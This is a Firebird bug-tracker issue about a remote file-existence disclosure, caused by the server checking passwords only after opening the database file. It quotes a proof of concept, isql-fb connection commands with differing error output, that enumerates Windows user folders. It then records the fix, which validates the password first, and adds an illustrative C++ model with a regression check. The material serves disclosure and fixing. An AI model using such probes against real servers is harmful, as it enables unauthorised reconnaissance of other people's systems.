A remote attacker can check, if a file is present in the system, running firebird server [CORE1312] #1731
Comments
Commented by: @AlexPeshkoff Now password validation is done as soon as possible - right after getting database options from DPB. This makes 'bad password' the first exception to happen when connecting to the server, at the same time saving a lot of work in case wrong credentials are passed.
Modified by: @AlexPeshkoff status: Open [ 1 ] => Resolved [ 5 ] resolution: Fixed [ 1 ] Fix Version: 2.1 Beta 1 [ 10141 ] Fix Version: 2.0.2 [ 10130 ]
Modified by: @AlexPeshkoff Fix Version: 2.1.0 [ 10041 ] Version: 2.1 Alpha 1 [ 10150 ] => Version: 2.1 Initial [ 10160 ] => Version: 1.5.4 [ 10100 ] => Version: 2.0.0 [ 10091 ] => Version: 1.5.3 [ 10028 ] => Version: 1.5.2 [ 10027 ] => Version: 1.5.1 [ 10026 ] => Version: 1.5.0 [ 10025 ] => Version: 1.0.3 [ 10006 ] => Fix Version: 2.1 Beta 1 [ 10141 ] =>
Modified by: @pcisar Fix Version: 2.1 Beta 1 [ 10141 ] summary: A remote attacker can check, if a => A remote attacker can check, if a file is present in the system, running firebird server Fix Version: 2.1.0 [ 10041 ] =>
Commented by: @pmakowski Are you sure it is solved? Here is what I get under Windows with FB2.1.0Beta1:
C:\FB21\bin>isql "192.168.1.10:c:\driver\rappin_ch09.pdf"
C:\FB21\bin>isql "192.168.1.10:c:\driver\rappin_ch0.pdf"
Commented by: @AlexPeshkoff Pavel, this all makes sense only for attempts to connect by users not having a valid login/password on the server. I noticed there are no -u/-p switches, but maybe you have a correct pair in the environment? Next, since 2.1 beta1 trusted authentication also works for Windows - i.e. you will be connected to a database with your Windows logon as CURRENT_USER if you have logged in to the Windows server. Please try something like:
Commented by: @pmakowski Sorry. Seems I made the bad test. If I try to connect from another box, you are right, the bug is solved, so I'll close the bug.
Commented by: @pmakowski Q/A test made and ok
Modified by: @pmakowski status: Reopened [ 4 ] => Closed [ 6 ] resolution: Fixed [ 1 ] Fix Version: 2.1 Beta 2 [ 10190 ]
Modified by: @pcisar Workflow: jira [ 12286 ] => Firebird [ 14788 ]
Submitted by: @AlexPeshkoff
Is related to QA132
Bug was reported by David Calligaris <mailto:david.calligaris@emaze.net>:
------------------
There is an information disclosure vulnerability in the Firebird 2.0.1
protocol implementation that could allow a remote attacker to check if a
file is present in the remote system. Successful exploitation of this
vulnerability allows the remote attacker to launch further attacks on
the remote host.
Proof Of Concept:
-----------------
Example of Windows User Enumeration:
<EXAMPLE>
diaul@yeshu:~$ isql-fb "192.168.1.75:C:\Documents and Settings\diaul"
Statement failed, SQLCODE = -902
I/O error for file "C:\Documents and Settings\diaul"
-Error while trying to open file
-Access is denied.
Use CONNECT or CREATE DATABASE to specify a database
SQL>
diaul@yeshu:~$ isql-fb "192.168.1.75:C:\Documents and Settings\FooBar"
Statement failed, SQLCODE = -902
I/O error for file "C:\Documents and Settings\FooBar"
-Error while trying to open file
-The system cannot find the file specified.
Use CONNECT or CREATE DATABASE to specify a database
SQL>
</EXAMPLE>
You can see there are two different error messages for valid and invalid
resources.
------------------
The reason for the bug is that password validation is done almost at the end of the database attach/create calls.
Commits: c76f165 e5f1e63
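
The ordering problem described in this issue, as an added example that is not part of the original report and not Firebird source code: a simplified model showing why validating the password before opening the file gives an unauthenticated caller the same error for every path. The names `Host`, `attachFileFirst`, `attachAuthFirst`, `leaksPathState` and `sampleHost`, the account and the `bad password` string are assumptions made for the illustration.

```cpp
#include <map>
#include <string>

// Simplified model, not Firebird code. All names and data are constructed.
struct Host {
    std::map<std::string, bool> files;  // path -> readable by the server
    std::string user, password;         // the one valid account
    bool credentialsOk(const std::string& u, const std::string& p) const {
        return u == user && p == password;
    }
    // Returns "" on success, else an OS-style error like those in the report.
    std::string openFile(const std::string& path) const {
        auto it = files.find(path);
        if (it == files.end()) return "The system cannot find the file specified.";
        if (!it->second) return "Access is denied.";
        return "";
    }
};

const std::string BAD_LOGIN = "bad password";  // stand-in for the login error

// Ordering named as the cause: the file is touched before the password check.
std::string attachFileFirst(const Host& h, const std::string& path,
                            const std::string& u, const std::string& p) {
    std::string err = h.openFile(path);
    if (!err.empty()) return err;  // file state reaches an unauthenticated caller
    return h.credentialsOk(u, p) ? "" : BAD_LOGIN;
}

// Ordering named as the fix: credentials are validated first.
std::string attachAuthFirst(const Host& h, const std::string& path,
                            const std::string& u, const std::string& p) {
    if (!h.credentialsOk(u, p)) return BAD_LOGIN;  // same answer for every path
    return h.openFile(path);
}

using AttachFn = std::string (*)(const Host&, const std::string&,
                                 const std::string&, const std::string&);
// Regression check: with invalid credentials, do two paths get different errors?
bool leaksPathState(AttachFn attach, const Host& h,
                    const std::string& a, const std::string& b) {
    return attach(h, a, "nobody", "wrong") != attach(h, b, "nobody", "wrong");
}

Host sampleHost() {
    Host h;
    h.files["C:\\Documents and Settings\\diaul"] = false;  // exists, unreadable
    h.user = "appuser"; h.password = "constructed-pw";
    return h;
}
```

A check like `leaksPathState` can serve as a regression test for the attach path: it should stay false for any pair of paths when the credentials are invalid.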